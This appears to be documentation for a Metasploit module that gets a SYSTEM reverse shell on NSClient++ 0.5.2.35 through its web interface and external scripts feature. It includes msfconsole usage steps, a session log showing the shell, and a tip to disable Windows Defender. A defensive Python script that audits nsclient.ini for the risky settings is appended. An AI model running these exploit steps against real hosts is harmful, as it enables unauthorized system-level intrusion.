## Vulnerable Application

### Description

This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell. For this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled.

### Installation

A vulnerable version of NSClient++ can be downloaded from [here](https://nsclient.org/download/). Then you can follow this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

1. Start `msfconsole`
2. `use exploit/windows/http/nscp_authenticated_rce`
3. `set RHOST <target>`
4. `set PASSWORD <admin password>` to set the admin password of the NSClient++ web interface
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability and start a shell

## Options

### PASSWORD

Set the PASSWORD of the admin account of NSClient++.

## Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender, as the msf payload could be spotted). See the following output:

```
msf6 > use nscp_authenticated_rce
[*] Using configured payload windows/x64/shell_reverse_tcp
msf6 exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf6 exploit(nscp_authenticated_rce) > set password easypassword
password => easypassword
msf6 exploit(nscp_authenticated_rce) > exploit

[*] Started reverse TCP handler on y.y.y.y:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[+] The target is vulnerable. External scripts feature enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: zqlmwevxef)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200

C:\Program Files\NSClient++>whoami
whoami
nt authority\system
```
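The description above names two preconditions for this module, an enabled web interface and an enabled external scripts feature, and the session shows the resulting shell running as `nt authority\system`. The following Python script is an added example, not part of the Metasploit module or of NSClient++: it audits an `nsclient.ini` for exactly those preconditions (plus an empty admin password) so a defender can find exposed agents before anyone with the password does. The section and key names it looks for (`[/modules]` with `WEBServer` and `CheckExternalScripts`, `[/settings/default]` with `password`) follow the default `nsclient.ini` layout and are an assumption; the two sample configurations are constructed here, not taken from any real host.

```python
# Added example: audit an NSClient++ nsclient.ini for the preconditions of the
# authenticated RCE described above. Not the Metasploit module's own code.
# ASSUMPTION: section/key names follow the default nsclient.ini layout.
import configparser
from dataclasses import dataclass, field
from typing import List, Optional

# Values NSClient++ treats as "on" for a module entry (assumption).
ENABLED_VALUES = {"enabled", "1", "true", "yes"}


@dataclass
class AuditResult:
    web_interface: bool      # WEBServer module enabled
    external_scripts: bool   # CheckExternalScripts module enabled
    password_set: bool       # non-empty admin password configured
    findings: List[str] = field(default_factory=list)

    @property
    def exposed(self) -> bool:
        # Both preconditions from the module description must hold.
        return self.web_interface and self.external_scripts


def _is_enabled(value: Optional[str]) -> bool:
    return value is not None and value.strip().lower() in ENABLED_VALUES


def audit_nsclient_ini(text: str) -> AuditResult:
    """Parse nsclient.ini text and report the risky combination of settings."""
    parser = configparser.ConfigParser(
        interpolation=None, allow_no_value=True, strict=False
    )
    parser.read_string(text)
    # configparser lower-cases option names, so lookups use lower-case keys.
    modules = dict(parser.items("/modules")) if parser.has_section("/modules") else {}
    defaults = (
        dict(parser.items("/settings/default"))
        if parser.has_section("/settings/default")
        else {}
    )

    web = _is_enabled(modules.get("webserver"))
    ext = _is_enabled(modules.get("checkexternalscripts"))
    pw_set = bool((defaults.get("password") or "").strip())

    result = AuditResult(web, ext, pw_set)
    if web:
        result.findings.append("web interface (WEBServer) is enabled")
    if ext:
        result.findings.append("external scripts (CheckExternalScripts) are enabled")
    if web and ext:
        result.findings.append(
            "both preconditions of the authenticated RCE are met: anyone holding "
            "the admin password can run commands as the service account"
        )
    if web and not pw_set:
        result.findings.append("web interface is enabled with an empty admin password")
    return result


# Constructed sample: the exposed layout the module needs.
VULNERABLE_INI = """
; constructed sample nsclient.ini (not from a real host)
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled
CheckSystem = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password =
"""

# Constructed sample: the same file after hardening.
HARDENED_INI = """
; constructed sample nsclient.ini (not from a real host)
[/modules]
CheckExternalScripts = disabled
WEBServer = disabled
CheckSystem = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = correct-horse-battery-staple
"""

if __name__ == "__main__":
    for label, ini in (("vulnerable", VULNERABLE_INI), ("hardened", HARDENED_INI)):
        r = audit_nsclient_ini(ini)
        print(f"[{label}] exposed={r.exposed}")
        for f in r.findings:
            print("  -", f)
```

Run it against a real `nsclient.ini` by reading the file into `audit_nsclient_ini`; an `exposed` result means the only thing standing between the network and a SYSTEM shell is the admin password, so either disable one of the two modules where it is not needed or restrict `allowed hosts` and set a strong password.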